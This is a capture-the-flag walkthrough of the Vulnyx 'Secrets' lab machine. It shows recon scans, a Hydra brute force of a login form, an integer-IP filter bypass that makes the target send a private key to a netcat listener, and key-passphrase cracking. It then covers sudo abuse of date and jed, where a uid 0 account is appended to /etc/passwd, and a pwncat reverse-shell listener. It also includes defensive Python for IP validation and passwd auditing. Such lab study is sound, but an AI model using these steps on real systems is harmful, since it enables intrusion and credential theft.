Vulnyx-Secrets-Walkthrough
城南花已开

Information Gathering

Service Detection

sudo arp-scan -l
[sudo] password for Pepster:
Interface: eth0, type: EN10MB, MAC: 5e:bb:f6:9e:ee:fa, IPv4: 192.168.60.100
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.60.1 00:50:56:c0:00:08 VMware, Inc.
192.168.60.2 00:50:56:e3:f6:57 VMware, Inc.
192.168.60.217 08:00:27:f2:eb:a5 PCS Systemtechnik GmbH
192.168.60.254 00:50:56:e5:e5:eb VMware, Inc.

8 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.089 seconds (122.55 hosts/sec). 4 responded
export ip=192.168.60.217
❯ rustscan -a $ip
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
Breaking and entering... into the world of open ports.

[~] The config file is expected to be at "/home/Pepster/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.60.217:22
Open 192.168.60.217:80
[~] Starting Script(s)
[~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-28 10:24 CST
Initiating ARP Ping Scan at 10:24
Scanning 192.168.60.217 [1 port]
Completed ARP Ping Scan at 10:24, 0.07s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 10:24
Completed Parallel DNS resolution of 1 host. at 10:24, 0.01s elapsed
DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
Initiating SYN Stealth Scan at 10:24
Scanning 192.168.60.217 [2 ports]
Discovered open port 22/tcp on 192.168.60.217
Discovered open port 80/tcp on 192.168.60.217
Completed SYN Stealth Scan at 10:24, 0.04s elapsed (2 total ports)
Nmap scan report for 192.168.60.217
Host is up, received arp-response (0.00038s latency).
Scanned at 2025-02-28 10:24:15 CST for 0s

PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
80/tcp open http syn-ack ttl 64
MAC Address: 08:00:27:F2:EB:A5 (Oracle VirtualBox virtual NIC)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.32 seconds
Raw packets sent: 3 (116B) | Rcvd: 3 (116B)

A directory scan turns up /secrets.

❯ gobuster dir -u "http://$ip" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.217
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 403,404
[+] User Agent: gobuster/3.6
[+] Extensions: zip,txt,php,html
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 122]
/secrets (Status: 301) [Size: 318] [--> http://192.168.60.217/secrets/]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

Entry Hint

Fetching the page with curl shows that index.html hides an HTML comment, which gives us the username brad.

❯ curl $ip
I have to tell you a secret...
<!-- written by brad -->
❯ curl http://192.168.60.217/secrets/
I keep wanting to tell you a secret...

Scan again under the /secrets directory.

❯ gobuster dir -u "http://$ip/secrets" -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php,html,zip,txt -b 403,404
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.60.217/secrets
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404,403
[+] User Agent: gobuster/3.6
[+] Extensions: html,zip,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 39]
/login_form.php (Status: 200) [Size: 429]
Progress: 1038215 / 1038220 (100.00%)
===============================================================
Finished
===============================================================

There is a login form.

Submitting arbitrary credentials redirects to MK67IT044XYGGIIWLGS9.php.

Brute-forcing with Hydra

Brute-force the POST form with hydra; the password turns out to be bradley.

❯ hydra -l brad -P /usr/share/wordlists/rockyou.txt $ip http-post-form '/secrets/MK67IT044XYGGIIWLGS9.php:user=brad&password=^PASS^:Invalid Credentials'
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-28 10:51:28
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.60.217:80/secrets/MK67IT044XYGGIIWLGS9.php:user=brad&password=^PASS^:Invalid Credentials
[80][http-post-form] host: 192.168.60.217 login: brad password: bradley
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-28 10:51:38

After logging in, the page only accepts numeric input.

A normal dotted IP address is rejected, but the IP can be converted to its integer form and submitted that way.
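The integer trick works because the form's input check and the operating system's address parser disagree about what an address looks like. This added Python example (not code from the original post) reproduces both sides: it converts the listener address 192.168.60.100 to its integer form, shows that inet_aton resolves the bare integer back to the same address, and gives a strict validator that closes the gap. The digits-only filter models the form's behaviour as an assumption; the server-side code is not shown on the page.

```python
import ipaddress
import socket

# Constructed sample: the listener address used in the walkthrough.
LISTENER = "192.168.60.100"


def ip_to_int(dotted: str) -> int:
    """Dotted-quad IPv4 -> 32-bit integer (the form only accepts digits)."""
    return int(ipaddress.IPv4Address(dotted))


def int_to_ip(value: int) -> str:
    """32-bit integer -> dotted-quad IPv4."""
    return str(ipaddress.IPv4Address(value))


def digits_only_filter(value: str) -> bool:
    """Assumed model of the form's weak check: accept only digit strings."""
    return value.isdigit()


def address_reached(value: str) -> str:
    """What the OS actually connects to. glibc inet_aton accepts the
    bare-integer form (as well as hex and short forms), so the filter
    and the later connect() do not agree on what counts as an address."""
    return socket.inet_ntoa(socket.inet_aton(value))


def hardened_filter(value: str) -> bool:
    """Allowlist-style check: parse strictly as a dotted quad (the ipaddress
    module rejects "3232250980"), then require a globally routable address.
    Assumption: the feature is meant to reach external hosts only."""
    try:
        addr = ipaddress.IPv4Address(value)
    except ipaddress.AddressValueError:
        return False
    return addr.is_global


if __name__ == "__main__":
    as_int = str(ip_to_int(LISTENER))
    print(LISTENER, "->", as_int)
    print("weak filter accepts integer form:", digits_only_filter(as_int))
    print("kernel resolves it to:", address_reached(as_int))
    print("hardened filter accepts integer form:", hardened_filter(as_int))
```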


Submit it again and capture the traffic with Wireshark.

The target machine tries to send data to port 6666 on the supplied IP.

Listening on that port with nc receives the contents of a private key.

❯ nc -lnvp 6666
listening on [any] 6666 ...
connect to [192.168.60.100] from (UNKNOWN) [192.168.60.217] 45940
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,478250418EF67EB4
...
-----END RSA PRIVATE KEY-----

Cracking the key's passphrase yields security.

User Privilege Escalation

Try logging in with the username obtained above.

❯ vi id_rsa
❯ ssh2john id_rsa >hash
❯ john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
security (id_rsa)
1g 0:00:00:00 DONE (2025-02-28 12:41) 50.00g/s 153600p/s 153600c/s 153600C/s qwertyui..dangerous
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
❯ ssh brad@$ip -i id_rsa
The authenticity of host '192.168.60.217 (192.168.60.217)' can't be established.
ED25519 key fingerprint is SHA256:KGZwtmwggtu0zpCwCkOfNz+QU/CxhhYeZZQiHd8tQIc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.60.217' (ED25519) to the list of known hosts.
Enter passphrase for key 'id_rsa':
Linux secrets 4.19.0-18-amd64 #1 SMP Debian 4.19.208-1 (2021-09-29) x86_64
brad@secrets:~$ cat user.txt
56a42034352d678d4e6ee235c5419cb3

User brad has sudo rights to run date as fabian.

That is effectively a file read: date -f treats every line of the given file as a date string and echoes back each line it cannot parse.

Reading fabian's .bash_history this way reveals a password hidden in it.

brad@secrets:~$ sudo -l
Matching Defaults entries for brad on secrets:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User brad may run the following commands on secrets:
(fabian) NOPASSWD: /usr/bin/date
brad@secrets:/home$ sudo -u fabian date -f /home/fabian/.bash_history
date: fecha inválida «cd
date: fecha inválida «ls -la»
date: fecha inválida «passwd fabian»
date: fecha inválida «s3cr3t$$$L0v3$$$»
date: fecha inválida «exit -y»
brad@secrets:/home$ su fabian
Contraseña:
fabian@secrets:/home$ cd ~

Root Privilege Escalation

fabian also has sudo rights.

fabian@secrets:~$ sudo -l
Matching Defaults entries for fabian on secrets:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User fabian may run the following commands on secrets:
(root) NOPASSWD: /usr/bin/jed

Checking the help output shows that jed is an editor and can modify files.

Append the line primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash to /etc/passwd.

The login password is 123456, which gives root.

fabian@secrets:~$ sudo /usr/bin/jed -help
Jed usage forms:

0. jed [--version | --help]
1. jed [--batch] [-n] [-e emulation] [-a alt-jedrc-file] \
[file ...] \ % edit files
[-g linenumber] \ % goto line
[-s search-string] \ % performa search
[-l file-to-load] \ % load slang file
[-f function] \ % execute function
[-i file-to-insert] \ % insert file
[-2] \ % split window
[-tmp] \ % do not backup buffer
[-hook funct (argv)] \ % exec funct with rest of argv parameters
[--ANYTHING] % execute ANYTHING as a function

2. jed -script FILE [arg ...]

3. jed-script FILE [arg ...]
This form sets __argv[0] to FILE, __argv[1] to arg, ...
fabian@secrets:~$ sudo /usr/bin/jed /etc/passwd
fabian@secrets:~$ su primary
Contraseña:
root@secrets:/home/fabian# id
uid=0(root) gid=0(root) grupos=0(root)
root@secrets:/home/fabian# cat /root/root.txt
cfd58a2c97ff992fd7777c5e1baf8265
root@secrets:/home/fabian#
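The persistence step above (a new uid 0 entry with its hash written straight into /etc/passwd) is easy to spot from the defender's side. This added Python audit, not part of the original post, parses a constructed /etc/passwd sample that includes a line shaped like the one the walkthrough adds and flags the three things that make it stand out.

```python
# Constructed /etc/passwd sample: three ordinary entries plus a line shaped like
# the one the walkthrough appends (uid 0, hash stored in the file, home /root).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
fabian:x:1001:1001::/home/fabian:/bin/bash
primary:zSZ7Whrr8hgwY:0:0::/root:/bin/bash
"""

# Password-field values that mean "look in /etc/shadow" or "locked".
SHADOWED = {"x", "*", "!", "!!"}


def audit_passwd(text: str) -> list:
    """Return (line number, account, finding) tuples for suspicious entries."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, line[:20], "malformed entry (expected 7 fields)"))
            continue
        name, pw, uid, _gid, _gecos, home, _shell = fields
        if uid == "0" and name != "root":
            findings.append((lineno, name, "uid 0 account other than root"))
        if pw == "":
            findings.append((lineno, name, "empty password field"))
        elif pw not in SHADOWED:
            findings.append((lineno, name, "password hash stored in /etc/passwd, not /etc/shadow"))
        if home == "/root" and name != "root":
            findings.append((lineno, name, "non-root account using /root as home"))
    return findings


def accounts_flagged(text: str) -> list:
    """Sorted, de-duplicated list of account names with at least one finding."""
    return sorted({name for _, name, _ in audit_passwd(text)})


if __name__ == "__main__":
    for lineno, name, why in audit_passwd(PASSWD_SAMPLE):
        print(f"line {lineno}: {name}: {why}")
```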

Alternatively, run a shell command from inside jed.

Then just listen on the port.

❯ pwncat-cs -lp 4444
[12:58:04] Welcome to pwncat 🐈! __main__.py:164
[12:58:05] received connection from 192.168.60.217:47668 bind.py:84
[12:58:06] 192.168.60.217:47668: registered new host w/ db manager.py:957
(local) pwncat$
(remote) root@secrets:/etc# id
uid=0(root) gid=0(root) grupos=0(root)
(remote) root@secrets:/etc# cat /root/root.txt
cfd58a2c97ff992fd7777c5e1baf8265